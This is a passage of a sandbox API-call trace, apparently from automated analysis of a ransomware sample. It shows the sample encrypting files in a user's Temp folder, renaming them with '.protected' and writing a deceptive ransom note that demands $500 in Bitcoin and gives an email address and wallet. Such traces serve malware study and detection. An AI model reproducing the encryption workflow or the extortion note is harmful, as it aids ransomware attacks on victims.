"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini.protected")) returned 1 [0086.817] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.817] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0086.817] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0086.817] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0086.817] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0086.817] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0086.817] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat") returned 82 [0086.817] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0086.817] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0086.817] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.817] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.818] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat") returned 82 [0086.818] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0086.818] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat") returned 82 [0086.818] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0086.818] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat") returned 82 [0086.818] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0086.818] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0086.820] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.820] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0086.821] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.821] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0086.821] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0086.821] CloseHandle (hObject=0x150) returned 1 [0086.822] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat.protected") returned 92 [0086.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat.protected")) returned 1 [0086.823] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0086.823] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0086.823] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\RESTORE_FILES.txt") returned 90 [0086.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0086.825] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.825] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0086.825] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.825] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.826] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.826] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0086.826] CloseHandle (hObject=0x14c) returned 1 [0086.827] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.827] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.827] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\RESTORE_FILES.txt") returned 78 [0086.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.827] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.827] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.828] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.828] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.828] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.828] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0086.828] CloseHandle (hObject=0xd8) returned 1 [0086.829] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.829] lstrcmpiW (lpString1="HK0R80bH0DLkf.odt", lpString2="Windows") returned -1 [0086.829] lstrcmpiW (lpString1="HK0R80bH0DLkf.odt", lpString2="Program Files") returned -1 [0086.829] lstrcmpiW (lpString1="HK0R80bH0DLkf.odt", lpString2="Program Files (x86)") returned -1 [0086.829] lstrcmpiW (lpString1="HK0R80bH0DLkf.odt", lpString2="$Recycle.bin") returned 1 [0086.829] lstrcmpiW (lpString1="HK0R80bH0DLkf.odt", lpString2="System Volume Information") returned -1 [0086.829] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt") returned 70 [0086.829] StrStrIW (lpFirst="HK0R80bH0DLkf.odt", lpSrch=".protected") returned 0x0 [0086.829] lstrcmpW (lpString1="HK0R80bH0DLkf.odt", lpString2="RESTORE_FILES.txt") returned -1 [0086.829] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.829] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hk0r80bh0dlkf.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt") returned 70 [0086.830] StrStrW (lpFirst="HK0R80bH0DLkf.odt", lpSrch=".txt") returned 0x0 [0086.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt") returned 70 [0086.830] StrStrW (lpFirst="HK0R80bH0DLkf.odt", lpSrch=".rar") returned 0x0 [0086.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt") returned 70 [0086.830] StrStrW (lpFirst="HK0R80bH0DLkf.odt", lpSrch=".zip") returned 0x0 [0086.830] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.831] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.831] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.831] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.831] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.831] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.832] CloseHandle (hObject=0xd8) returned 1 [0086.832] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt.protected") returned 80 [0086.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hk0r80bh0dlkf.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hk0r80bh0dlkf.odt.protected")) returned 1 [0086.833] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.833] lstrcmpiW (lpString1="kKaSaw.wav", lpString2="Windows") returned -1 [0086.833] lstrcmpiW (lpString1="kKaSaw.wav", lpString2="Program Files") returned -1 [0086.833] lstrcmpiW (lpString1="kKaSaw.wav", lpString2="Program Files (x86)") returned -1 [0086.833] lstrcmpiW (lpString1="kKaSaw.wav", lpString2="$Recycle.bin") returned 1 [0086.833] lstrcmpiW (lpString1="kKaSaw.wav", lpString2="System Volume Information") returned -1 [0086.833] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav") returned 63 [0086.833] StrStrIW (lpFirst="kKaSaw.wav", lpSrch=".protected") returned 0x0 [0086.834] lstrcmpW (lpString1="kKaSaw.wav", lpString2="RESTORE_FILES.txt") returned -1 [0086.834] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.834] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kkasaw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav") returned 63 [0086.834] StrStrW (lpFirst="kKaSaw.wav", lpSrch=".txt") returned 0x0 [0086.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav") returned 63 [0086.834] StrStrW (lpFirst="kKaSaw.wav", lpSrch=".rar") returned 0x0 [0086.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav") returned 63 [0086.834] StrStrW (lpFirst="kKaSaw.wav", lpSrch=".zip") returned 0x0 [0086.834] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.835] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.835] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.836] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.836] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.836] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.836] CloseHandle (hObject=0xd8) returned 1 [0086.837] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav.protected") returned 73 [0086.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kkasaw.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kkasaw.wav.protected")) returned 1 [0086.838] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.838] lstrcmpiW (lpString1="KVahML13uO-CFVabiO9D.xlsx", lpString2="Windows") returned -1 [0086.838] lstrcmpiW (lpString1="KVahML13uO-CFVabiO9D.xlsx", lpString2="Program Files") returned -1 [0086.838] lstrcmpiW (lpString1="KVahML13uO-CFVabiO9D.xlsx", lpString2="Program Files (x86)") returned -1 [0086.838] lstrcmpiW (lpString1="KVahML13uO-CFVabiO9D.xlsx", lpString2="$Recycle.bin") returned 1 [0086.838] lstrcmpiW (lpString1="KVahML13uO-CFVabiO9D.xlsx", lpString2="System Volume Information") returned -1 [0086.838] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx") returned 78 [0086.838] StrStrIW (lpFirst="KVahML13uO-CFVabiO9D.xlsx", lpSrch=".protected") returned 0x0 [0086.838] lstrcmpW (lpString1="KVahML13uO-CFVabiO9D.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0086.838] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.838] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kvahml13uo-cfvabio9d.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.839] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx") returned 78 [0086.839] StrStrW (lpFirst="KVahML13uO-CFVabiO9D.xlsx", lpSrch=".txt") returned 0x0 [0086.839] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx") returned 78 [0086.839] StrStrW (lpFirst="KVahML13uO-CFVabiO9D.xlsx", lpSrch=".rar") returned 0x0 [0086.839] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx") returned 78 [0086.839] StrStrW (lpFirst="KVahML13uO-CFVabiO9D.xlsx", lpSrch=".zip") returned 0x0 [0086.839] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.840] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.840] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.841] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.841] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.841] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.841] CloseHandle (hObject=0xd8) returned 1 [0086.842] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx.protected") returned 88 [0086.842] 